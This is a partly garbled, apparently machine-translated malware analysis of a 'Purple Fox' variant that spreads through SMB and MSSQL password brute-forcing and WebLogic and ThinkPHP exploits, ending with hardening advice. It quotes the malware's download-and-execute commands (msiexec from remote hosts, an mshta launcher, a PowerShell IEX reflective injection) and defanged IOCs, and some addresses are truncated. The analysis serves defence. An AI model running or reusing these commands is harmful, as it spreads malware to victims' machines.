1. Home > Virus prevention >

The purple fox virus was upgraded again, using weak password blasting and server vulnerability attacks to spread

1. Background
The Tencent Security Threat Intelligence Center has detected the latest variant of the "Purple Fox" virus, which is spread through SMB and MSSQL weak password blasting attacks, and also uses remote codes of server components such as Weblogic and ThinkPHP. The execution of loopholes to attack and spread has strengthened the spreading ability of the virus family again. The virus family ultimately profited by controlling the amount of broiler computers and promoting the installation of software that users do not need.
The purple fox virus family first appeared in 2018, initially spread through Trojan horse downloaders, and has been active ever since. Afterwards, it spread through swiping software (for details, please refer to: The swiping software "Traffic Bao Flow Edition" disclosed by the Yujian Threat Intelligence Center in September spread the "Purple Fox" virus through a horse-hanging attack). The new virus variant uses the PendingFileRenameOperations mechanism to replace system files to achieve boot-up, release and install the driver to protect the Trojan horse, and has strong persistent attack capabilities.
The recent attack trends of the "Purple Fox" virus are as follows:

Second, sample analysis
from /0E2335FDC174DB4EBECF77184CBF8706.moe
The downloaded sample (md5: 372c265d58089533dae5b42c2e94078b) is actually an MSI installation package. The Trojan installation package MSI contains 3 files, one non-PE file (encrypted PE file), and the other two are 32-bit And the 64-bit Trojan DLL, the virus still uses the system PendingFileRenameOperations mechanism to replace the system files to achieve startup.

After msi is installed, the system prompts to restart the computer.

After restarting the system, release the file C:\Windows\AppPatch\Ke971119.xsl, decrypt the Trojan horse
DLL C:\Windows \System32\Ms6E6AA944App.dll

Then try to install the Trojan DLL as a service by writing to the registry.
HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\Ms6E6AA944AppBak\Parameters\ServiceDll C:\Windows\System32\Ms6E6AA944App.dll.
Ms6E6AA944App.dll decrypt driver, install system callback Cmpcallback.

The driver installs the file filtering system to protect the Trojan.

Inject shellcode into svchost.exe, scan port 445 and port 1433 for random IP addresses in the same network segment of the machine, and then initiate SMB for machines with open ports Blasting and MSSQL blasting attacks.

Use the built-in IP list when blasting, and the password dictionary is as follows:

After SMB blasting is successful, use smbexec to execute the command:
Cmd /c for /d %i in ( do Msiexec /i http ://%i/72AFD4AB0CB8B0453C3E90E7903D9315.moe /Q
After the MsSQL blast is successful, execute the shell command through "cmdexec":
"C:/Windows/system32/cmd.exe" /c mshta vbscript:createobject( "wscript.shell").run("Cmd /c for /d %i in ( do Msiexec /i http://%i/61BF1E594ABE3B46B111B1A3C82CAFEA.moe /Q",0)(window.close)

MsSQL will also run Sqlexec through Powershell when blasting, and then pass the command as a parameter ExeArgs for execution:
C:/Windows/System32/WindowsPowerShell /v1.0/powershell.exe -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString(http://rawcdn.githack.com/28308/256/388472586c8aed167752f6174e7de42660b68551/Sqlexec/pe.jpg); Invoke-ReflectivePEInjection -PEUrl http://rawcdn.githack.com/28308/256/388472586c8aed167752f6174e7de42660b68551/Sqlexec/1505164.jpg -ExeArgs /Cmd /c for /d %i in ( 167.248) .105.30:18745) do Msiexec /i http://%i/61BF1E594ABE3B46B111B1A3C82CAFEA.moe
Write the 1.hta script file in the global startup directory to download the Trojan.

Analysis found that the purple fox virus also uses Weblogic deserialization remote code execution vulnerability (CNVD-C-2019-48814, CVE- 2019-2725) to attack. Due to flaws in the process of deserializing input information, unauthorized attackers can send carefully constructed malicious HTTP requests to use this vulnerability to gain server permissions and realize remote code execution. The vulnerable version of the program is OracleWebLogic Server 10. .*, Oracle WebLogic Server 12.1.3.

The high-risk vulnerability (CNVD- 2018-24942). The vulnerability is mainly caused by the fact that the route/dispatch module in the php code does not filter malicious commands in the URL. Without the mandatory routing enabled, it can cause remote command execution, including the execution of shell commands and calls. php function, write webshell, etc. The main affected versions include 5.x

3. Security Recommendations
1. It is recommended that the enterprise server close the network ports that are not required to be enabled (Such as 135, 139, 445), the method can be referred to: https://guanjia.qq.com/web_clinic/s8/585.html;
2. The enterprise intranet uses a password security policy to force the use of strong passwords, Do not use weak passwords, and do not use one password for multiple servers to prevent hackers from brute force cracking;
3. Regularly reinforce the server, fix the security vulnerabilities of the enterprise server-related components as soon as possible, and timely repair the vulnerabilities;< br/>IOCs
http[:]//207.148. 86.248:17941/72AFD4AB0CB8B0453C3E90E7903D9315.moe
http[:]//45.32.64. [:]//
98A32A4C. .moe
http[:]// 2ADDD9840398A1D8CB6CD35C0C50A4C.moe
http[:]// /
http[:]//139.180.7C79462EF985ed />http[:]//
.http[90.]/15/91 13446/61BF1E594ABE3B46B111B1A3C82CAFEA.moe

This article is published by www.internetweblist.com and does not represent the position of www.internetweblist.com/:http://www.internetweblist.com/Virus prevention/20295.html

Contact Us

Online consultation:click here to give a message